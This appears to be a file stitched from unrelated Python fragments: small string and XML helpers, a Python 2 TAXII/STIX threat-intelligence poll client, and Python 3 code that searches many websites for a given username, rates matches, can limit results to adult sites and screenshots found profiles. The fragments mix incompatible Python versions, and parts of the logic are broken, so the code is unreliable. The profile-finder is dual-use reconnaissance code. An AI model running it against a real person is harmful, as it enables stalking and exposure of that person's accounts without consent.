    return (_num, _unit)
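# Hedged usage sketch, assuming `from re import sub as resub`: the numeric part
# and the unit come back as separate strings.
assert str2tupleunit("12.5kg") == ("12.5", "kg")
assert str2tupleunit("100 km/h") == ("100", "km/h")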
def one_line_xml(string):
    string = "".join(string.splitlines())
    string = resub(r"[>]\s+[<]", "><", string)
    string = string.strip()
    return string
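# Hedged usage sketch, assuming `from re import sub as resub`: newlines are
# dropped and whitespace between tags is collapsed.
assert one_line_xml("<a>\n  <b/>\n</a>") == "<a><b/></a>"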
def main():
    parser = scripts.get_base_parser("Poll Query Client", path="/services/poll/")
    parser.add_argument("--collection", dest="collection", default="default_queryable",
                        help="Data Collection to poll. Defaults to 'default_queryable'.")
    parser.add_argument("--allow-asynch", dest="allow_asynch", default=True,
                        help="Indicate whether or not the client supports Asynchronous Polling. Defaults to True")
    parser.add_argument("--tev", dest="tev", default=t.CB_STIX_XML_111,
                        help="Indicate which Targeting Expression Vocabulary is being used. Defaults to STIX XML 1.1.1")
    parser.add_argument("--target", dest="target", default="**/@id",
                        help="The targeting expression to use. Defaults to **/@id (Any id, anywhere).")
    parser.add_argument("--rel", dest="relationship", default="equals",
                        help="The relationship to use (e.g., equals). Defaults to equals.")
    parser.add_argument("--cm", dest="capability_module", default=None,
                        help="The capability module being used. If not specified, the script will attempt to infer the correct capability module")

    # Parameters - optional depending on what relationship is chosen
    parser.add_argument("--value", dest=tdq.P_VALUE, default=None,
                        help="The value to look for. Required (or not) and allowed values depend on the relationship.")
    parser.add_argument("--match-type", dest=tdq.P_MATCH_TYPE, default=None,
                        choices=['case_sensitive_string', 'case_insensitive_string', 'number'],
                        help="The match type. Required (or not) and allowed values depend on the relationship.")
    parser.add_argument("--case-sensitive", dest=tdq.P_CASE_SENSITIVE, default=None,
                        choices=[True, False],
                        help="Whether the match is case sensitive. Required (or not) and allowed values depend on the relationship.")

    args = parser.parse_args()

    capability_module = None
    relationship = None
    for cm_id, cm in tdq.capability_modules.iteritems():
        relationship = cm.relationships.get(args.relationship.lower(), None)
        if args.capability_module:
            # The user specified a value - try to match on that
            if cm_id == args.capability_module:
                if not relationship:
                    # If the specified relationship is not in the capability module, that's an error
                    raise ValueError('Relationship (%s) not found in capability module (%s). Valid relationships are: %s' %
                                     (args.relationship, args.capability_module, cm.relationships.keys()))
                capability_module = cm
        elif relationship:
            # User did not specify a value for capability_module, attempt to infer
            capability_module = cm
        if capability_module:
            break

    if not capability_module:
        raise ValueError("Unable to map relationship to Capability Module: %s" % args.relationship)

    # Make sure all required params are set and
    # no unused params are set
    tdq_params = {}
    for parameter in tdq.P_NAMES:
        param_obj = relationship.parameters.get(parameter, None)  # Will either be a parameter object or None
        param_value = getattr(args, parameter)  # Will either be a value or None
        if param_obj and not param_value:
            raise ValueError('The parameter "%s" is needed and was not specified. Specify using --%s <value>' %
                             (parameter, parameter.replace('_', '-')))
        if param_value and not param_obj:
            raise ValueError('The parameter %s was specified and is not needed' % parameter)
        if param_obj:
            param_obj.verify(param_value)
            tdq_params[parameter] = param_value

    test = tdq.Test(capability_id=capability_module.capability_module_id,
                    relationship=relationship.name,
                    parameters=tdq_params)
    criterion = tdq.Criterion(target=args.target, test=test)
    criteria = tdq.Criteria(operator=tdq.OP_AND, criterion=[criterion])
    q = tdq.DefaultQuery(args.tev, criteria)

    poll_req = tm11.PollRequest(message_id=tm11.generate_message_id(),
                                collection_name=args.collection,
                                poll_parameters=tm11.PollRequest.PollParameters(
                                    allow_asynch=args.allow_asynch, query=q))

    print "Request:\n"
    if args.xml_output is False:
        print poll_req.to_text()
    else:
        print poll_req.to_xml(pretty_print=True)

    client = scripts.create_client(args)

    resp = client.call_taxii_service2(args.host, args.path, t.VID_TAXII_XML_11,
                                      poll_req.to_xml(pretty_print=True), args.port)
    r = t.get_message_from_http_response(resp, '0')

    print "Response:\n"
    if args.xml_output is False:
        print r.to_text()
    else:
        print r.to_xml(pretty_print=True)

    if r.message_type == tm11.MSG_POLL_RESPONSE:
        for cb in r.content_blocks:
            if cb.content_binding.binding_id == t.CB_STIX_XML_10:
                format = '_STIX10_'
                ext = '.xml'
            elif cb.content_binding.binding_id == t.CB_STIX_XML_101:
                format = '_STIX101_'
                ext = '.xml'
            elif cb.content_binding.binding_id == t.CB_STIX_XML_11:
                format = '_STIX11_'
                ext = '.xml'
            elif cb.content_binding.binding_id == t.CB_STIX_XML_111:
                format = '_STIX111_'
                ext = '.xml'
            else:  # Format and extension are unknown
                format = ''
                ext = ''
            if cb.timestamp_label:
                date_string = 't' + cb.timestamp_label.isoformat()
            else:
                date_string = 's' + datetime.datetime.now().isoformat()
            # note: the response object is `r` here, not `response`
            filename = (r.collection_name.lstrip(".") +
                        format +
                        resub(r"[^a-zA-Z0-9]", "_", date_string) +
                        ext).translate(None, '/\\:*?"<>|')
            filename = os.path.join(args.dest_dir, filename)
            f = open(filename, 'w')
            f.write(cb.content)
            f.flush()
            f.close()
            print "Wrote Content Block to %s" % filename
def fetch_url(site, username, options):
    sleep(randint(1, 99) / 100)
    LOG.info("[Checking] " + get_fld(site["url"]))
    source = ""
    detection_level = {
        "extreme": {
            "fast": "normal",
            "slow": "normal,advanced,ocr",
            "detections": "true",
            "count": 1,
            "found": 2
        },
        "high": {
            "fast": "normal",
            "slow": "normal,advanced,ocr",
            "detections": "true,false",
            "count": 2,
            "found": 1
        },
        "current": "high"
    }
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0",
    }
    try:
        response = get(site["url"].replace("{username}", username),
                       timeout=5, headers=headers, verify=False)
        source = response.text
        response.close()
        text_only = "unavailable"
        title = "unavailable"
        temp_profile = {}
        temp_detected = {}
        detections_count = 0

        def merge_dicts(temp_dict):
            result = {}
            for item in temp_dict:
                for key, value in item.items():
                    if key in result:
                        result[key] += value
                    else:
                        result[key] = value
            return result

        def detect_logic(detections):
            detections_count = 0
            temp_detected = []
            temp_found = "false"
            temp_profile = {
                "found": 0,
                "image": "",
                "link": "",
                "rate": "",
                "status": "",
                "title": "unavailable",
                "language": "unavailable",
                "text": "unavailable",
                "type": "unavailable",
                "good": "",
                "method": ""
            }
            for detection in detections:
                temp_found = "false"
                if detection["type"] in detection_level[detection_level["current"]]["fast"] and source != "":
                    detections_count += 1
                    if detection["string"].replace("{username}", username).lower() in source.lower():
                        temp_found = "true"
                    if detection["return"] == temp_found:
                        temp_profile["found"] += 1
            return temp_profile, temp_detected, detections_count

        def detect():
            temp_profile_all = []
            temp_detected_all = []
            detections_count_all = 0
            for detection in site["detections"]:
                detections_ = []
                if detection["type"] == "shared":
                    detections_ = next(item for item in SHARED_DETECTIONS if item["name"] == detection['name'])
                if len(detections_) > 0:
                    val1, val2, val3 = detect_logic(detections_["detections"])
                    temp_profile_all.append(val1)
                    detections_count_all += val3
            val1, val2, val3 = detect_logic(site["detections"])
            temp_profile_all.append(val1)
            detections_count_all += val3
            return merge_dicts(temp_profile_all), temp_detected_all, detections_count_all

        temp_profile, temp_detected, detections_count = detect()
        if temp_profile["found"] >= detection_level[detection_level["current"]]["found"] and \
                detections_count >= detection_level[detection_level["current"]]["count"]:
            temp_profile["good"] = "true"
        with suppress(Exception):
            soup = BeautifulSoup(source, "html.parser")
            [tag.extract() for tag in soup(["head", "title", "style", "script", "[document]"])]
            temp_profile["text"] = soup.getText()
            temp_profile["text"] = resub(r"\s\s+", " ", temp_profile["text"])
        with suppress(Exception):
            temp_profile["language"] = get_language_by_parsing(source)
            if temp_profile["language"] == "unavailable":
                temp_profile["language"] = get_language_by_guessing(temp_profile["text"])
        with suppress(Exception):
            temp_profile["title"] = BeautifulSoup(source, "html.parser").title.string
            temp_profile["title"] = resub(r"\s\s+", " ", temp_profile["title"])
        temp_profile["text"] = temp_profile["text"].replace("\n", "").replace("\t", "").replace("\r", "").strip()
        temp_profile["title"] = temp_profile["title"].replace("\n", "").replace("\t", "").replace("\r", "").strip()
        if temp_profile["text"] == "":
            temp_profile["text"] = "unavailable"
        with suppress(Exception):
            if detections_count != 0:
                temp_value = round(((temp_profile["found"] / detections_count) * 100), 2)
                temp_profile["rate"] = "%" + str(temp_value)
                if temp_value >= 100.00:
                    temp_profile["status"] = "good"
                elif temp_value >= 50.00 and temp_value < 100.00:
                    temp_profile["status"] = "maybe"
                else:
                    temp_profile["status"] = "bad"
        temp_profile["link"] = site["url"].replace("{username}", username)
        temp_profile["type"] = site["type"]
        if "FindUserProfilesFast" in options and "GetUserProfilesFast" not in options:
            temp_profile["method"] = "find"
        elif "GetUserProfilesFast" in options and "FindUserProfilesFast" not in options:
            temp_profile["method"] = "get"
        elif "FindUserProfilesFast" in options and "GetUserProfilesFast" in options:
            temp_profile["method"] = "all"
        copy_temp_profile = temp_profile.copy()
        return 1, site["url"], copy_temp_profile
    except Exception as e:
        pass
    return None, site["url"], []
def check_user_cli(self, argv):
    '''
    main cli logic
    '''
    temp_detected = {"detected": [], "unknown": [], "failed": []}
    temp_options = "GetUserProfilesFast,FindUserProfilesFast"
    if argv.method != "":
        if argv.method == "find":
            temp_options = "FindUserProfilesFast"
        if argv.method == "get":
            temp_options = "GetUserProfilesFast"
    req = {"body": {"uuid": str(uuid4()), "string": argv.username, "options": temp_options}}
    self.setup_logger(uuid=req["body"]["uuid"], file=True, argv=argv)
    self.init_logic()
    if argv.cli:
        if not self.silent:
            self.log.info("[Warning] --cli is not needed and will be removed later on")
    for site in self.websites_entries:
        site["selected"] = "false"
    if argv.websites == "all":
        list_of_countries = []
        if argv.countries != "all":
            list_of_countries = argv.countries.split(" ")
            for site in self.websites_entries:
                if site["country"] != "" and site["country"].lower() in list_of_countries:
                    site["selected"] = "true"
                else:
                    site["selected"] = "false"
        else:
            for site in self.websites_entries:
                site["selected"] = "true"
        if argv.type != "all":
            sites = [d for d in self.websites_entries if d.get('selected') == "true"]
            if "adult" in argv.type.lower():
                for site in sites:
                    if "adult" in site["type"].lower():
                        self.search_and_change(site, {"selected": "pending"})
                for site in self.websites_entries:
                    if site["selected"] == "pending":
                        site["selected"] = "true"
                    else:
                        site["selected"] = "false"
        if int(argv.top) != 0:
            sites = [d for d in self.websites_entries if d.get('selected') == "true"]
            sites = [d for d in sites if d.get('global_rank') != 0]
            sites = sorted(sites, key=lambda x: x['global_rank'])
            for site in sites[:int(argv.top)]:
                self.search_and_change(site, {"selected": "pending"})
            for site in self.websites_entries:
                if site["selected"] == "pending":
                    site["selected"] = "true"
                else:
                    site["selected"] = "false"
    else:
        for site in self.websites_entries:
            for temp in argv.websites.split(" "):
                if temp in site["url"]:
                    site["selected"] = "true"
    true_websites = 0
    for site in self.websites_entries:
        if site["selected"] == "true":
            true_websites += 1
    if not self.silent:
        self.log.info("[Init] Selected websites: {}".format(true_websites))
    results = self.find_username_normal(req)
    for item in results:
        if item is not None:
            if item["method"] == "all":
                if item["good"] == "true":
                    item = self.delete_keys(item, ["method", "good"])
                    item = self.clean_up_item(item, argv.options)
                    temp_detected["detected"].append(item)
                else:
                    item = self.delete_keys(item, ["found", "rate", "status", "method", "good", "text", "extracted", "metadata"])
                    item = self.clean_up_item(item, argv.options)
                    temp_detected["unknown"].append(item)
            elif item["method"] == "find":
                if item["good"] == "true":
                    item = self.delete_keys(item, ["method", "good"])
                    item = self.clean_up_item(item, argv.options)
                    temp_detected["detected"].append(item)
            elif item["method"] == "get":
                item = self.delete_keys(item, ["found", "rate", "status", "method", "good", "text", "extracted", "metadata"])
                item = self.clean_up_item(item, argv.options)
                temp_detected["unknown"].append(item)
        else:
            item = self.delete_keys(item, ["found", "rate", "status", "method", "good", "text", "title", "language", "rate", "extracted", "metadata"])
            item = self.clean_up_item(item, argv.options)
            temp_detected["failed"].append(item)
    with suppress(Exception):
        if len(temp_detected["detected"]) == 0:
            del temp_detected["detected"]
        else:
            if "all" in argv.profiles or "detected" in argv.profiles:
                if argv.filter == "all":
                    pass
                else:
                    temp_detected["detected"] = [item for item in temp_detected["detected"]
                                                 if item['status'] in argv.filter]
                if len(temp_detected["detected"]) > 0:
                    temp_detected["detected"] = sorted(temp_detected["detected"],
                                                       key=lambda k: float(k['rate'].strip('%')),
                                                       reverse=True)
                else:
                    del temp_detected["detected"]
            else:
                del temp_detected["detected"]
        if len(temp_detected["unknown"]) == 0:
            del temp_detected["unknown"]
        else:
            if "all" in argv.profiles or "unknown" in argv.profiles:
                pass
            else:
                del temp_detected["unknown"]
        if len(temp_detected["failed"]) == 0:
            del temp_detected["failed"]
        else:
            if "all" in argv.profiles or "failed" in argv.profiles:
                pass
            else:
                del temp_detected["failed"]
    if argv.output == "pretty" or argv.output == "":
        if 'detected' in temp_detected:
            if not self.silent:
                self.log.info("[Detected] {} Profile[s]".format(len(temp_detected['detected'])))
        if 'unknown' in temp_detected:
            if not self.silent:
                self.log.info("[unknown] {} Profile[s]".format(len(temp_detected['unknown'])))
        if 'failed' in temp_detected:
            if not self.silent:
                self.log.info("[failed] {} Profile[s]".format(len(temp_detected['failed'])))
    if "detected" in temp_detected:
        if self.screenshots and self.screenshots_location:
            location = None
            with suppress(Exception):
                if not self.silent:
                    self.log.info("[Info] Getting screenshots of {} profiles".format(
                        len([item['link'] for item in temp_detected["detected"]])))
            with suppress(Exception):
                g = Galeodes(browser="chrome",
                             arguments=['--headless', self.headers['User-Agent']],
                             options=None, implicit_wait=5, verbose=False)
                results = g.get_pages(urls=[item['link'] for item in temp_detected["detected"]],
                                      screenshots=True, number_of_workers=10,
                                      format='jpeg', base64=False)
                for item in results:
                    if item['image'] is not None:
                        with suppress(Exception):
                            file_name = resub(r'[^\w\d-]', '_', item['url']) + '.jpeg'
                            with open(path.join(self.screenshots_location, file_name), 'wb') as f:
                                f.write(item['image'])
                            location = self.screenshots_location
            if location:
                if not self.silent:
                    self.log.info("[Info] Screenshots location {}".format(location))
    if argv.output == "pretty" or argv.output == "":
        if 'detected' in temp_detected:
            if not self.silent:
                self.log.info({"custom": temp_detected['detected']})
        if 'unknown' in temp_detected:
            if not self.silent:
                self.log.info({"custom": temp_detected['unknown']})
        if 'failed' in temp_detected:
            if not self.silent:
                self.log.info({"custom": temp_detected['failed']})
    if argv.output == "json":
        if not self.silent:
            self.log.info(dumps(temp_detected, sort_keys=True, indent=None))
    return temp_detected
def cleanTags(string):
    htmlCleaned = Cleaner(allow_tags=[''],
                          remove_unknown_tags=False,
                          style=True).clean_html(string or u"dummy")
    return resub(r"\s\s+", " ", htmlCleaned)